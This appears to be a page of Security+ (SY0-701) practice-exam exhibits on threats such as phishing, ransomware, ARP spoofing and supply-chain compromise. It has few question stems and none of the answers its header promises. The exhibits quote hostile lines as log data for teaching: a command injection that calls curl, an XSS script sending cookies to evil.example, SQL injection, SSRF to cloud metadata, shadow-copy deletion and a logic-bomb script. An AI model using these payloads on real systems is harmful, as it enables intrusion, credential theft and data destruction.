SY0-701 Threats, Vulnerabilities, and Mitigations • Complete Question Bank
Complete SY0-701 Threats, Vulnerabilities, and Mitigations question bank — all 0 questions with answers and detailed explanations.
Email message From: Payroll Support <payroll-help@vendor-portal.example> Subject: Urgent: Verify your account now Body: We detected a payroll issue. Reply with the one-time code we just sent to your phone so we can restore your mailbox today. Failure to act within 10 minutes may suspend access.
Help desk call transcript Caller: "Hi, this is Morgan from the executive assistant team. The CFO is in a meeting and needs a transfer completed in the next 15 minutes. I am sending the approval right now. Please confirm the wire amount and account details over the phone so I can finish the request."
Based on the exhibit, which indicator should the security team prioritize for endpoint detection and hunting?
The attacker rotates infrastructure frequently, but one artifact has remained consistent across recent investigations.
Threat intelligence note: - Delivery domains change daily using disposable VPS providers - File hashes vary because the payload is repacked for each campaign - Email lure wording changes weekly - The malware consistently creates a mutex named `Global\WkSvcHost_0F92` - One case also showed a registry key under `HKCU\Software\SysTools\Cache` but that key was not present in every sample
Based on the exhibit, what is the BEST fix for the vulnerability being exploited?
A user with a standard account can retrieve documents by changing the `docId` value in the request. The application returns another employee's file without any authorization error.
Web server access log excerpt: 10:41:12 GET /portal/document?docId=4411 200 user=jcarter 10:41:14 GET /portal/document?docId=4412 200 user=jcarter 10:41:15 GET /portal/document?docId=4413 200 user=jcarter Application debug log: [INFO] Document lookup completed successfully. [WARN] No authorization check performed after object lookup. [INFO] Returned file owner: finance2
Based on the exhibit, what is the MOST likely activity taking place on the network?
A user opened a spreadsheet shortly before unusual internal connection patterns began. The same account is now authenticating to many hosts in rapid succession.
NetFlow and Windows event excerpt: Host: WS-22 (10.20.5.18) 14:31 10.20.5.18 -> 10.20.5.41 TCP/445 14:32 10.20.5.18 -> 10.20.5.43 TCP/5985 14:32 10.20.5.18 -> 10.20.5.47 TCP/445 14:33 10.20.5.18 -> 10.20.5.52 TCP/5985 14:34 10.20.5.18 -> 10.20.5.61 TCP/445 Security log highlights: Event 4769 spike for user ACME\rlopez Event 7045: Service created on 10.20.5.43 named "PSEXESVC" Multiple hosts show remote logon type 3 from WS-22
Host activity log 11:22:08 Command executed: vssadmin delete shadows /all /quiet 11:22:15 Files in Finance share renamed with extension .enc 11:22:21 Ransom note created: READ_ME_NOW.txt 11:22:28 Multiple user documents no longer open correctly
Threat intelligence note Campaign summary: - Malicious domains change every 24 hours - Executable file hash stays the same across samples - TLS certificate fingerprint remains: 4F:91:2C:AA:7D:10:88:6B:... - User agent string varies by host
Based on the exhibit, what is the BEST remediation for the application flaw shown?
A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.
Application log excerpt: 15:08:02 POST /tools/pingHost host=10.0.0.15 15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15" 15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s 15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s" 15:09:12 Outbound HTTPS session established to 198.51.100.55
Based on the exhibit, what is the BEST immediate containment action?
The workstation is still powered on, and the user reports that files are being renamed and the system is running very slowly. The security analyst confirms malicious activity is in progress.
EDR event timeline: 14:02:11 excel.exe spawned powershell.exe with -enc parameter 14:02:13 powershell.exe created scheduled task: "OneDrive Update" 14:02:18 explorer.exe began renaming multiple .docx files to .lock 14:02:21 outbound HTTPS connection to 198.51.100.77:443 14:02:24 security service attempted to terminate, then recovered
Based on the exhibit, which issue should be remediated FIRST?
The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.
Vulnerability scan summary: 1) Internet-facing VPN appliance CVSS: 8.8 Exploit status: public proof-of-concept available Exposure: reachable from the internet Compensating controls: none 2) Internal HR file server CVSS: 9.8 Exploit status: no public exploit yet Exposure: reachable only from the employee VLAN Compensating controls: segmented network and MFA for admin access 3) Lab workstation CVSS: 10.0 Exploit status: public exploit available Exposure: isolated lab VLAN with no routing to production 4) DMZ reporting server CVSS: 7.5 Exploit status: public exploit available Exposure: internet-reachable, but protected by WAF and IP allowlisting
Based on the exhibit, what is the MOST likely explanation for the network traffic?
The affected host is not showing a large amount of internet-bound traffic, but its DNS behavior is highly unusual.
DNS query log excerpt: Host: CORP-LT-17 16:18:02 a9f3d1k2d.update-check.com A NXDOMAIN 16:18:03 b7p9q2s1n.update-check.com A NXDOMAIN 16:18:04 k8z1m4c7r.update-check.com A NXDOMAIN 16:18:05 u3n6t9x0v.update-check.com A NXDOMAIN 16:18:06 9q2m7a4p1.update-check.com A NXDOMAIN Proxy log excerpt: No corresponding HTTP or HTTPS sessions observed TTL observed: 60 seconds on all queries
Based on the exhibit, what is the BEST response by the employee?
The message appears to come from a trusted internal support team, but the sender details and request do not align with normal procedures.
Email header and body excerpt: From: "IT Helpdesk" <help@corp-support.example> Reply-To: support@mail-secure-login.com Subject: URGENT: MFA re-sync required Body: "Your mailbox will be suspended in 15 minutes. To complete the repair, reply with the 6-digit code that was just sent to your phone. If you do not respond now, your account will be locked."
EDR timeline from a finance laptop: 08:14:02 winword.exe launched powershell.exe 08:14:03 powershell.exe executed with arguments: -WindowStyle Hidden -NoProfile -EncodedCommand SQBFAFgAKAAuLi4= 08:14:05 No new executable written to disk 08:14:08 Outbound HTTPS connection to 198.51.100.77 over port 443 08:14:11 User reports a document opened normally, but the machine began showing unusual network activity
Web application log excerpt: Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1 Response: 500 Internal Server Error Database log: syntax error near "OR" at line 1 Developer note: the search feature appends user input directly into the SQL query string without parameterization.
Configuration review output from a new network camera deployment: Interface status: 0.0.0.0:8080 LISTEN camera-web 0.0.0.0:554 LISTEN rtsp-stream Admin banner: Firmware version 1.0.3 Admin login: enabled Password policy: not enforced Firewall ACL: allow tcp any any eq 8080 allow tcp any any eq 554
Network capture summary: Host 10.20.14.25 sends ARP requests for 10.20.14.1 Multiple ARP replies received: 10.20.14.1 is-at 02:42:ac:11:00:05 10.20.14.1 is-at 02:42:ac:11:00:05 10.20.14.1 is-at 66:77:88:99:aa:bb Client gateway cache alternates between the legitimate gateway MAC and 66:77:88:99:aa:bb every few seconds. Users report brief certificate warnings when opening internal sites.
File server FS-02: C:\Shared\Finance\Q4\APR_invoice.xlsx -> APR_invoice.xlsx.locked C:\Shared\Finance\Q4\Budget2026.docx -> Budget2026.docx.locked C:\Shared\Finance\Q4\README_RECOVER.txt created in every directory Command history from the server console: vssadmin delete shadows /all /quiet wmic shadowcopy delete Users report they can see filenames but cannot open the files.
From: BrightStone Invoices <billing@brightstone-payments.com> Reply-To: Accounts Payable <ap@brightstone-invoices.net> Subject: Updated remittance details for PO 44718 Hello Dana, Please see the attached invoice addendum for the Orion office renovation project we completed last month. To avoid a late fee, send the balance today to the new bank account listed in the PDF. Thank you, BrightStone Billing
Support ticket excerpt:
A customer posted the following in a public product review field:
<script>fetch('https://evil.example/steal?c='+document.cookie)</script>
The same script later appeared in the review page for other visitors, and the security team found several unexpected requests to the attacker-controlled domain.Help desk incident notes: - User installed a free video converter from an unofficial download site. - Browser home page changed without permission. - A new extension appeared named "QuickSearch Helper". - Outbound traffic to tracking.example-cdn.net increased every few minutes. - The endpoint security console reports that saved browser cookies were accessed by an unknown process.
Email header excerpt: From: "Evan Brooks" <evan.brooks@northstar-invoices.co> To: ap-team@contoso.example Subject: Updated pricing for Project Orion - action needed today Message body: Hi Lena, Per our call last week about Project Orion, please review the revised pricing sheet attached. The customer asked for approval before 3:00 PM so we can keep the launch on schedule. If the file does not open, reply here and I will send a new link.
External vulnerability scan summary for a small branch office server: Host: 203.0.113.44 Open ports: 22/tcp open ssh 80/tcp open http 5900/tcp open vnc Findings: - VNC authentication: disabled - SSH: restricted to password login only - Web admin page accessible from any source network - Server is in the DMZ and stores customer support tickets
Help desk voicemail transcript: 'Hi, this is Elena from identity operations. I opened ticket INC-7712 because your MFA app is out of sync. Read me the 6-digit code that just arrived so I can clear the lockout before payroll closes.' Ticketing system: no open ticket INC-7712 exists Caller ID displayed: corporate main line
Wireless scan from the lobby: SSID: CorpWiFi BSSID: 18:AA:10:22:44:60 Signal: -78 dBm SSID: CorpWiFi BSSID: 7C:22:90:11:33:AA Signal: -41 dBm SSID: CorpGuest BSSID: 18:AA:10:22:44:61 Signal: -79 dBm User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."
Packet Capture Summary Host 10.20.30.44 sends repeated ARP replies: "10.20.30.1 is at 00:11:22:33:44:55" "10.20.30.1 is at 00:11:22:33:44:55" Switch logs: DHCP snooping: disabled ARP inspection: disabled Users report intermittent gateway connectivity and traffic sent to the wrong MAC address.
Task Scheduler entry on FIN-SRV2:
Task Name: MonthlyCleanup
Trigger: 12/31/2026 18:00
Action: powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\cleanup.ps1
Script contents:
if ($env:USERNAME -eq 'j.smith') { Remove-Item C:\Finance\Archive\* -Recurse -Force }
Security note: The script was added by a former contractor before departure.EDR Alert - WS-14 Time: 03:14:22 Parent process: svchost.exe Child process: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <redacted> Network activity: HTTPS request to hxxps://updates-check[.]com/a7 File creation: none detected Registry change: Run key modified under HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Application log excerpt: GET /thumbnail?imageUrl=http://169.254.169.254/latest/meta-data/iam/security-credentials/ Response status: 200 Returned content includes cloud role names and temporary credentials metadata Web server outbound connection recorded to the local metadata address
Build pipeline notes: - Package manager updated dependency: "fast-logger" from 2.4.1 to 2.4.2 - New outbound connection at startup: api.fast-logger-support[.]com - No code changes were made by the development team - Security review note: "Dependency source is a recently created public repository account"
CI Build Output Downloading package: report-utils@4.2.0 Expected integrity: sha512-F3d9e2f0e3a9c1... Actual integrity: sha512-7ab4d1c19f0a22... Source registry: registry.example.net Build status: WARN - package checksum mismatch Developer note: The update was pulled automatically during the nightly pipeline.
Reverse proxy config excerpt: proxy_set_header X-Original-URL $request_uri; proxy_set_header X-Forwarded-User $remote_user; Access log: GET /app/report HTTP/1.1 200 X-Original-URL: /admin/export X-Forwarded-User: jlee Backend log: 09:41:11 GET /admin/export user=jlee role=analyst response=200 09:41:13 POST /admin/export user=jlee role=analyst response=200
Vulnerability review summary: Finding A: CVE-2025-1184 | DMZ web server | Internet-facing | Remote code execution | Exploit in the wild | Patch available Finding B: CVE-2025-4420 | Engineering laptop | Internal-only lab VLAN | CVSS 9.8 | Requires local access | No network path Finding C: CVE-2025-6011 | File server | Internal network | Requires authenticated user | Compensating ACL restricts access Finding D: CVE-2025-7044 | Backup appliance | Internal network | No patch yet | Vendor says issue is unreachable from network
EDR summary: - Parent process: taskeng.exe - Child process: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand ... - No new executable files were created in user profile folders - Scheduled task 'UpdateSvc' launches every 5 minutes - Outbound TLS connections to 198.51.100.77 occur immediately after execution
Host 192.0.2.45 arp -a Internet Address Physical Address Type 192.0.2.1 00-50-56-a1-b2-c3 dynamic 192.0.2.1 00-50-56-a1-b2-c4 dynamic Packet capture: 10:14:02 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4 10:14:03 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4 10:14:05 Gateway traffic is briefly forwarded to 192.0.2.200 Switch CAM table: Gi1/0/7 00:50:56:a1:b2:c4 Gi1/0/24 00:50:56:a1:b2:c4
Web Access Log 2026-04-17T10:22:11Z "GET /thumb?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 512 2026-04-17T10:22:14Z "GET /thumb?url=http://10.0.5.14:8080/admin HTTP/1.1" 200 133 Application server outbound connections observed to internal RFC1918 addresses after each request.
Weekly vulnerability scan summary: 1. WEB01 - Public web server - Critical CVE with known exploit and no compensating control 2. FILE02 - Internal file server - Medium severity missing patch 3. LAP09 - User laptop - Low severity browser plug-in issue 4. PRN01 - Network printer - Informational firmware notice only
Administrator checks a suspected host: tasklist /svc | findstr vpn (no output) netstat -ano | findstr 51433 TCP 0.0.0.0:51433 0.0.0.0:0 LISTENING 4 driverquery /v | findstr /i kbdflt2 kbdflt2.sys Unknown C:\Windows\System32\drivers\kbdflt2.sys EDR note: Process enumeration from user mode does not match kernel event telemetry.
Drag steps to the numbered slots on the right, or tap a step then tap a slot.
Drag steps to the numbered slots on the right, or tap a step then tap a slot.